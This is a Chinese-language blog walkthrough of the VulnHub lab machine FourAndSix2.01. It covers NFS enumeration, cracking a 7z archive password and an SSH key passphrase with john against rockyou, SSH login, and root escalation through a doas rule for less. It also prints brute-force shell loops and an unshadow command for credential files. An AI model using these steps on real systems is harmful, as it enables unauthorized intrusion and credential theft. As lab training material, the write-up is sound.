FourandSix2.01靶机

信息收集

┌──(kali㉿kali)-[~]
└─$ sudo nmap --min-rate 10000 -p- 192.168.56.111
[sudo] password for kali: 
Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-06 21:52 EDT
Warning: 192.168.56.111 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.56.111
Host is up (0.00044s latency).
Not shown: 61719 filtered tcp ports (no-response), 3813 closed tcp ports (reset)
PORT     STATE SERVICE
22/tcp   open  ssh
111/tcp  open  rpcbind
2049/tcp open  nfs
MAC Address: 08:00:27:41:81:5A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 71.15 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sT -sV -O -p22,111,2049 192.168.56.111
Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-06 21:53 EDT
Nmap scan report for 192.168.56.111
Host is up (0.00030s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.9 (protocol 2.0)
111/tcp  open  rpcbind 2 (RPC #100000)
2049/tcp open  nfs     2-3 (RPC #100003)
MAC Address: 08:00:27:41:81:5A (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: OpenBSD 6.X
OS CPE: cpe:/o:openbsd:openbsd:6
OS details: OpenBSD 6.0 - 6.4
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.25 seconds

┌──(kali㉿kali)-[~]
└─$ sudo nmap --script=vuln -p22,111,2049 192.168.56.111
Starting Nmap 7.92 ( https://nmap.org ) at 2023-06-06 22:00 EDT
Nmap scan report for 192.168.56.111
Host is up (0.00029s latency).

PORT     STATE SERVICE
22/tcp   open  ssh
111/tcp  open  rpcbind
2049/tcp open  nfs
MAC Address: 08:00:27:41:81:5A (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 24.50 seconds

挂载 nfs

┌──(kali㉿kali)-[~]
└─$ showmount -e 192.168.56.111                  
Export list for 192.168.56.111:
/home/user/storage (everyone)

┌──(kali㉿kali)-[~]
└─$ mkdir /tmp/infosec               
                                                                                                                    
┌──(kali㉿kali)-[~]
└─$ mount -t nfs 192.168.56.111:/home/user/storage /tmp/infosec
mount.nfs: failed to apply fstab options

奇怪的失败，查了以下，可能是需要 root 权限

┌──(kali㉿kali)-[~]
└─$ sudo mount -t nfs 192.168.56.111:/home/user/storage /tmp/infosec
                                                                                                                    
┌──(kali㉿kali)-[~]
└─$ cd /tmp/infosec          
                                                                                                                    
┌──(kali㉿kali)-[/tmp/infosec]
└─$ ls
backup.7z
                                                                                                                    
┌──(kali㉿kali)-[/tmp/infosec]
└─$ cp backup.7z /home/kali/Downloads/FourAndSix

7z 压缩文件爆破

其中只有一个 backup.7z 文件，将其复制到本地路径下，然后使用 file 命令查看文件类型，使用 7za l 命令查看压缩包里的文件有哪些

┌──(kali㉿kali)-[~/Downloads/FourAndSix]
└─$ ls
backup.7z
                                                                                                                    
┌──(kali㉿kali)-[~/Downloads/FourAndSix]
└─$ file backup.7z 
backup.7z: 7-zip archive data, version 0.4
                                                                                                                    
┌──(kali㉿kali)-[~/Downloads/FourAndSix]
└─$ where 7za                                                                                             
/usr/bin/7za
/bin/7za
                                                                                                                    
┌──(kali㉿kali)-[~/Downloads/FourAndSix]
└─$ 7za l backup.7z 

7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs AMD Ryzen 7 5800H with Radeon Graphics          (A50F00),ASM,AES-NI)

Scanning the drive for archives:
1 file, 62111 bytes (61 KiB)

Listing archive: backup.7z

--
Path = backup.7z
Type = 7z
Physical Size = 62111
Headers Size = 303
Method = LZMA2:16 7zAES
Solid = +
Blocks = 1

   Date      Time    Attr         Size   Compressed  Name
------------------- ----- ------------ ------------  ------------------------
2018-10-28 04:45:33 ....A         9000        61808  hello1.jpeg
2018-10-28 04:45:33 ....A         5247               hello2.png
2018-10-28 04:45:33 ....A         8903               hello3.jpeg
2018-10-28 04:45:33 ....A         8330               hello4.png
2018-10-28 04:45:33 ....A        10038               hello5.jpeg
2018-10-28 04:45:33 ....A         5931               hello6.png
2018-10-28 04:45:33 ....A         6181               hello7.jpeg
2018-10-28 04:45:33 ....A         8182               hello8.jpeg
2018-10-28 05:50:57 ....A         1856               id_rsa
2018-10-28 05:52:57 ....A          398               id_rsa.pub
------------------- ----- ------------ ------------  ------------------------
2018-10-28 05:52:57              64066        61808  10 files

其中包含了一些图片和 ssh 的公私钥

┌──(kali㉿kali)-[~/Downloads/FourAndSix]
└─$ 7za x backup.7z

7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs AMD Ryzen 7 5800H with Radeon Graphics          (A50F00),ASM,AES-NI)

Scanning the drive for archives:
1 file, 62111 bytes (61 KiB)

Extracting archive: backup.7z
--
Path = backup.7z
Type = 7z
Physical Size = 62111
Headers Size = 303
Method = LZMA2:16 7zAES
Solid = +
Blocks = 1

    
Enter password (will not be echoed):

尝试解压但是需要密码，直接回车报错，那就使用工具爆破吧，原本想使用 rarcrack 但是爆破速度实在太慢，谷歌了一下，打算使用 hashcat 搭配

┌──(kali㉿kali)-[~]
└─$ hashcat -m 11600 7z.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.5) starting

OpenCL API (OpenCL 2.0 pocl 1.8  Linux, None+Asserts, RELOC, LLVM 11.1.0, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
=====================================================================================================================================
* Device #1: pthread-AMD Ryzen 7 5800H with Radeon Graphics, 708/1480 MB (256 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

clBuildProgram(): CL_BUILD_PROGRAM_FAILURE

error: unknown target CPU 'generic'
Device pthread-AMD Ryzen 7 5800H with Radeon Graphics failed to build the program, log: error: unknown target CPU 'generic'

* Device #1: Kernel /usr/share/hashcat/OpenCL/shared.cl build failed.

Started: Tue Jun  6 22:22:43 2023
Stopped: Tue Jun  6 22:22:44 2023

hashcat 报错……搜了一下这个问题解决起来比较麻烦，应该是 VMware 的问题，尝试了几种方法都无效，那就在本机下载个 hashcat 来试试吧。

1	`hashcat.exe -m 11600 7z.hash rockyou.txt`

爆破是有结果了……但是有个更抽象的问题，爆破出来的密码好像是错的，无法解压 7z 文件，换个工具 john 试试吧

┌──(kali㉿kali)-[~]
└─$ john --format=7z -w /usr/share/wordlists/rockyou.txt 7z.hash 
Warning: invalid UTF-8 seen reading /usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (7z, 7-Zip archive encryption [SHA256 128/128 AVX 4x AES])
Cost 1 (iteration count) is 524288 for all loaded hashes
Cost 2 (padding size) is 0 for all loaded hashes
Cost 3 (compression type) is 2 for all loaded hashes
Cost 4 (data length) is 9488 for all loaded hashes
Will run 4 OpenMP threads
Proceeding with wordlist:/usr/share/john/password.lst
Press 'q' or Ctrl-C to abort, almost any other key for status
chocolate        (?)     
1g 0:00:00:05 DONE (2023-06-06 22:40) 0.1953g/s 65.62p/s 65.62c/s 65.62C/s benjamin..cruise
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

成功得到密码 chocolate，解压缩成功

──(kali㉿kali)-[~/Downloads/FourAndSix]
└─$ ls
backup.7z    hello2.png   hello4.png   hello6.png   hello8.jpeg  id_rsa.pub
hello1.jpeg  hello3.jpeg  hello5.jpeg  hello7.jpeg  id_rsa

┌──(kali㉿kali)-[~/Downloads/FourAndSix]
└─$ file *.jpeg
hello1.jpeg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 258x195, components 3
hello3.jpeg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 227x222, components 3
hello5.jpeg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 226x223, components 3
hello7.jpeg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 282x179, components 3
hello8.jpeg: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 204x248, components 3
                                                                                                                    
┌──(kali㉿kali)-[~/Downloads/FourAndSix]
└─$ file *.png 
hello2.png: PNG image data, 257 x 196, 8-bit colormap, non-interlaced
hello4.png: PNG image data, 206 x 244, 8-bit colormap, non-interlaced
hello6.png: PNG image data, 177 x 232, 8-bit colormap, non-interlaced
                                                                                                                    
┌──(kali㉿kali)-[~/Downloads/FourAndSix]
└─$ cat id_rsa.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDClNemaX//nOugJPAWyQ1aDMgfAS8zrJh++hNeMGCo+TIm9UxVUNwc6vhZ8apKZHOX0Ht+MlHLYdkbwSinmCRmOkm2JbMYA5GNBG3fTNWOAbhd7dl2GPG7NUD+zhaDFyRk5gTqmuFumECDAgCxzeE8r9jBwfX73cETemexWKnGqLey0T56VypNrjvueFPmmrWCJyPcXtoLNQDbbdaWwJPhF0gKGrrWTEZo0NnU1lMAnKkiooDxLFhxOIOxRIXWtDtc61cpnnJHtKeO+9wL2q7JeUQB00KLs9/iRwV6b+kslvHaaQ4TR8IaufuJqmICuE4+v7HdsQHslmIbPKX6HANn user@fourandsix2

私钥密码爆破

我们首先应该使用 file，xdg-open，binwalk（捆绑），exiftool（注释内容）来查看图片。

图片文件应该没什么问题，重点放在公私钥上，使用私钥登录试试

┌──(kali㉿kali)-[~/Downloads/FourAndSix]
└─$ ssh -i id_rsa user@192.168.56.111
The authenticity of host '192.168.56.111 (192.168.56.111)' can\'t be established.
ED25519 key fingerprint is SHA256:bYL1jAzqEuvAJUa0fNrhsGN1637L223ZIavvbfsCL0g.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.111' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':

私钥被加密了，那我们再来一次爆破

1 2	`┌──(kali㉿kali)-[~/Downloads/FourAndSix] └─$ ssh2john id_rsa >rsa_hash`

好像不太好直接指定 john 的 format 参数，那就交给 john 自己来测试吧。再次遇到小问题，session 直接结束了

Using default input encoding: UTF-8
Loaded 402687 password hashes with no different salts (tripcode [DES 128/128 AVX])
Warning: poor OpenMP scalability for this hash type, consider --fork=4
Will run 4 OpenMP threads
Proceeding with wordlist:/usr/share/john/password.lst
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:00 DONE (2023-06-06 22:52) 0g/s 354200p/s 354200c/s 142631MC/s 123456..sss
Session completed.

不清楚造成的原因是什么，但是使用 sudo 来运行 john 命令就破解成功了

┌──(kali㉿kali)-[~/Downloads/FourAndSix]
└─$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt rsa_hash
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes
Cost 2 (iteration count) is 16 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
12345678         (id_rsa)     
1g 0:00:00:00 DONE (2023-06-06 22:55) 1.111g/s 35.55p/s 35.55c/s 35.55C/s 123456..butterfly
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

ssh 登录

得到了密码，再次尝试 ssh 私钥登录

┌──(kali㉿kali)-[~/Downloads/FourAndSix]
└─$ ssh -i id_rsa user@192.168.56.111        
Enter passphrase for key 'id_rsa': 
Last login: Mon Oct 29 13:53:51 2018 from 192.168.1.114
OpenBSD 6.4 (GENERIC) #349: Thu Oct 11 13:25:13 MDT 2018

Welcome to OpenBSD: The proactively secure Unix-like operating system.

Please use the sendbug(1) utility to report bugs in the system.
Before reporting a bug, please try to reproduce it with the latest
version of the code.  With bug reports, please try to ensure that
enough information to reproduce the problem is enclosed, and if a
known fix for it exists, include that as well.

fourandsix2$ whoami
user
fourandsix2$ id
uid=1000(user) gid=1000(user) groups=1000(user), 0(wheel)

提权

接下来考虑提权操作，首先进行 Getshell 后的信息收集，当前路径的文件收集

fourandsix2$ ls
storage
fourandsix2$ pwd
/home/user
fourandsix2$ ls -liah
total 40
129920 drwxr-xr-x  4 user  user    512B Oct 29  2018 .
     2 drwxr-xr-x  3 root  wheel   512B Oct 29  2018 ..
129923 -rw-r--r--  1 user  user     87B Oct 11  2018 .Xdefaults
129924 -rw-r--r--  1 user  user    771B Oct 11  2018 .cshrc
129925 -rw-r--r--  1 user  user    101B Oct 11  2018 .cvsrc
129926 -rw-r--r--  1 user  user    359B Oct 11  2018 .login
129927 -rw-r--r--  1 user  user    175B Oct 11  2018 .mailrc
129928 -rw-r--r--  1 user  user    215B Oct 11  2018 .profile
129921 drwx------  2 user  user    512B Oct 29  2018 .ssh
129929 drwxr-xr-x  2 user  user    512B Oct 29  2018 storage
fourandsix2$ cd storage/                                                                                           
fourandsix2$ ls -liah
total 132
129929 drwxr-xr-x  2 user  user   512B Oct 29  2018 .
129920 drwxr-xr-x  4 user  user   512B Oct 29  2018 ..
129930 -rw-r--r--  1 user  user  60.7K Oct 29  2018 backup.7z

passwd 文件

fourandsix2$ cat /etc/passwd
root:*:0:0:Charlie &:/root:/bin/ksh
daemon:*:1:1:The devil himself:/root:/sbin/nologin
operator:*:2:5:System &:/operator:/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/sbin/nologin
build:*:21:21:base and xenocara build:/var/empty:/bin/ksh
sshd:*:27:27:sshd privsep:/var/empty:/sbin/nologin
_portmap:*:28:28:portmap:/var/empty:/sbin/nologin
_identd:*:29:29:identd:/var/empty:/sbin/nologin
_rstatd:*:30:30:rpc.rstatd:/var/empty:/sbin/nologin
_rusersd:*:32:32:rpc.rusersd:/var/empty:/sbin/nologin
_fingerd:*:33:33:fingerd:/var/empty:/sbin/nologin
_x11:*:35:35:X Server:/var/empty:/sbin/nologin
_switchd:*:49:49:Switch Daemon:/var/empty:/sbin/nologin
_traceroute:*:50:50:traceroute privdrop user:/var/empty:/sbin/nologin
_ping:*:51:51:ping privdrop user:/var/empty:/sbin/nologin
_rebound:*:52:52:Rebound DNS Daemon:/var/empty:/sbin/nologin
_unbound:*:53:53:Unbound Daemon:/var/unbound:/sbin/nologin
_dpb:*:54:54:dpb privsep:/var/empty:/sbin/nologin
_pbuild:*:55:55:dpb build user:/nonexistent:/sbin/nologin
_pfetch:*:56:56:dpb fetch user:/nonexistent:/sbin/nologin
_pkgfetch:*:57:57:pkg fetch user:/nonexistent:/sbin/nologin
_pkguntar:*:58:58:pkg untar user:/nonexistent:/sbin/nologin
_spamd:*:62:62:Spam Daemon:/var/empty:/sbin/nologin
www:*:67:67:HTTP Server:/var/www:/sbin/nologin
_isakmpd:*:68:68:isakmpd privsep:/var/empty:/sbin/nologin
_syslogd:*:73:73:Syslog Daemon:/var/empty:/sbin/nologin
_pflogd:*:74:74:pflogd privsep:/var/empty:/sbin/nologin
_bgpd:*:75:75:BGP Daemon:/var/empty:/sbin/nologin
_tcpdump:*:76:76:tcpdump privsep:/var/empty:/sbin/nologin
_dhcp:*:77:77:DHCP programs:/var/empty:/sbin/nologin
_mopd:*:78:78:MOP Daemon:/var/empty:/sbin/nologin
_tftpd:*:79:79:TFTP Daemon:/var/empty:/sbin/nologin
_rbootd:*:80:80:rbootd Daemon:/var/empty:/sbin/nologin
_ppp:*:82:82:PPP utilities:/var/empty:/sbin/nologin
_ntp:*:83:83:NTP Daemon:/var/empty:/sbin/nologin
_ftp:*:84:84:FTP Daemon:/var/empty:/sbin/nologin
_ospfd:*:85:85:OSPF Daemon:/var/empty:/sbin/nologin
_hostapd:*:86:86:HostAP Daemon:/var/empty:/sbin/nologin
_dvmrpd:*:87:87:DVMRP Daemon:/var/empty:/sbin/nologin
_ripd:*:88:88:RIP Daemon:/var/empty:/sbin/nologin
_relayd:*:89:89:Relay Daemon:/var/empty:/sbin/nologin
_ospf6d:*:90:90:OSPF6 Daemon:/var/empty:/sbin/nologin
_snmpd:*:91:91:SNMP Daemon:/var/empty:/sbin/nologin
_ypldap:*:93:93:YP to LDAP Daemon:/var/empty:/sbin/nologin
_rad:*:94:94:IPv6 Router Advertisement Daemon:/var/empty:/sbin/nologin
_smtpd:*:95:95:SMTP Daemon:/var/empty:/sbin/nologin
_rwalld:*:96:96:rpc.rwalld:/var/empty:/sbin/nologin
_nsd:*:97:97:NSD Daemon:/var/empty:/sbin/nologin
_ldpd:*:98:98:LDP Daemon:/var/empty:/sbin/nologin
_sndio:*:99:99:sndio privsep:/var/empty:/sbin/nologin
_ldapd:*:100:100:LDAP Daemon:/var/empty:/sbin/nologin
_iked:*:101:101:IKEv2 Daemon:/var/empty:/sbin/nologin
_iscsid:*:102:102:iSCSI Daemon:/var/empty:/sbin/nologin
_smtpq:*:103:103:SMTP Daemon:/var/empty:/sbin/nologin
_file:*:104:104:file privsep:/var/empty:/sbin/nologin
_radiusd:*:105:105:RADIUS Daemon:/var/empty:/sbin/nologin
_eigrpd:*:106:106:EIGRP Daemon:/var/empty:/sbin/nologin
_vmd:*:107:107:VM Daemon:/var/empty:/sbin/nologin
_tftp_proxy:*:108:108:tftp proxy daemon:/nonexistent:/sbin/nologin
_ftp_proxy:*:109:109:ftp proxy daemon:/nonexistent:/sbin/nologin
_sndiop:*:110:110:sndio privileged user:/var/empty:/sbin/nologin
_syspatch:*:112:112:syspatch unprivileged user:/var/empty:/sbin/nologin
_slaacd:*:115:115:SLAAC Daemon:/var/empty:/sbin/nologin
nobody:*:32767:32767:Unprivileged user:/nonexistent:/sbin/nologin
user:*:1000:1000:user:/home/user:/bin/ksh

没有定时任务？

1 2	`fourandsix2$ cat /etc/crontab cat: /etc/crontab: No such file or directory`

fourandsix2$ ls
acme               firmware           ldap               mtree              random.seed        skel
acme-client.conf   fstab              localtime          myname             rc                 soii.key
amd                ftpusers           locate.rc          netstart           rc.conf            spwd.db
authpf             gettytab           login.conf         newsyslog.conf     rc.conf.local      ssh
changelist         group              magic              npppd              rc.d               ssl
daily              hostname.em0       mail               ntpd.conf          resolv.conf        syslog.conf
disktab            hosts              mail.rc            passwd             resolv.conf.tail   termcap
doas.conf          hotplug            mailer.conf        pf.conf            rmt                ttys
dumpdates          iked               master.passwd      pf.os              rpc                usermgmt.conf
examples           installurl         moduli             ppp                services           weekly
exports            isakmpd            monthly            protocols          shells
fbtab              ksh.kshrc          motd               pwd.db             signify

doas 提权

etc 目录下确实没有定时任务的文件和目录，但是看到了一个特殊的文件，昨天刚刚遇到过这个提权手法 doas.conf

1
2
3

fourandsix2$ cat doas.conf
permit nopass keepenv user as root cmd /usr/bin/less args /var/log/authlog
permit nopass keepenv root as root

emmm，不能说一模一样，但也是差不多

less 新启 shell

这里有新建 shell 的手法（v 是打开 vi 编辑器），我们按照 gtfobins 来新启一个 shell

fourandsix2$ doas -u root /usr/bin/less /var/log/authlog                                                            
                                                                                                                    
fourandsix2# id                                                                                                     
uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest)                
fourandsix2# cd /root  
fourandsix2# ls
.Xdefaults .cshrc     .cvsrc     .forward   .login     .profile   .ssh       flag.txt
fourandsix2# cat flag.txt
Nice you hacked all the passwords!

Not all tools worked well. But with some command magic...:
cat /usr/share/wordlists/rockyou.txt|while read line; do 7z e backup.7z -p"$line" -oout; if grep -iRl SSH; then echo $line; break;fi;done

cat /usr/share/wordlists/rockyou.txt|while read line; do if ssh-keygen -p -P "$line" -N password -f id_rsa; then echo $line; break;fi;done


Here is the flag:
acd043bc3103ed3dd02eee99d5b0ff42
fourandsix2#

成功！

拾遗

挂载命令

1.目录事先存在，可以用 mkdir 命令新建目录
2.挂载点目录不可被其他进程使用到
3.挂载点下原有文件将被隐藏

//显示挂载点
showmount -e IP

//挂载到本地
mkdir /tmp/infosec
sudo mount -t nfs IP:/path /tmp/infosec

//卸载
sudo umount

-t 指定文件系统的类型，通常不必指定。mount 会自动选择正确的类型。常用类型有：
光盘或光盘镜像：iso9660;
DOS fat16 文件系统：msdos;
Windows 9x fat32 文件系统：vfat;
Windows NT ntfs 文件系统：ntfs;
Mount Windows 文件网络共享：smbfs;
UNIX (LINUX) 文件网络共享：nfs

john 爆破工具

Linux 哈希爆破

JtR 破解的文件必须有特定的格式。要转换 passwd 和 shadow 文件，我们需要利用/usr/sbin/unshade 可执行文件。这需要超级用户权限才能执行。

1 2	`sudo /usr/sbin/unshadow /etc/passwd /etc/shadow > ~/passwords.txt john --wordlist=/usr/share/wordlists/rockyou.txt ~/passwords.txt`

转化为 JTR 兼容的工具

┌──(kali㉿kali)-[~/Downloads/FourAndSix]
└─$ locate *2john 
/usr/sbin/bitlocker2john
/usr/sbin/dmg2john
/usr/sbin/gpg2john
/usr/sbin/hccap2john
/usr/sbin/keepass2john
/usr/sbin/putty2john
/usr/sbin/racf2john
/usr/sbin/rar2john
/usr/sbin/uaf2john
/usr/sbin/vncpcap2john
/usr/sbin/wpapcap2john
/usr/sbin/zip2john

SSH 密钥密码破解

要测试JTR的SSH密钥密码破解能力，首先要创建一组新的私钥。注意：JTR没有破解文件本身(即生成的密钥中的字节数并不重要)，JTR只是破解私钥的加密密码。

# Create some private key
ssh-keygen -t rsa -b 4096
# Create encrypted zip
/usr/sbin/ssh2john ~/.ssh/id_rsa > id_rsa.hash

接下来，您需要做的就是使用您的字典将 John the Ripper 指向给定文件：

1	`/usr/sbin/john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash`

doas 命令的始末

来自维基百科的解释

doas (“do as”)是一个用来以其他用户身份执行指令的程序。系统管理员可以对其进行设置，赋予指定用户执行特定指令的权限。其为以 ISC 许可证许可的自由及开放源代码软件，可在 UNIX 与类 Unix 操作系统中使用。doas 是由 Ted Unangst 为 OpenBSD 所开发的，是一种更简单且更安全的 sudo 替代品
权限的定义皆编写于配置文件 /etc/doas.conf 中

knowledge_database > vulnhub

FourandSix2.01靶机

https://i3eg1nner.github.io/2023/06/7015100879bb.html

作者

I3eg1nner

发布于

2023年6月7日

许可协议

Soccer靶机上一篇

PC靶机下一篇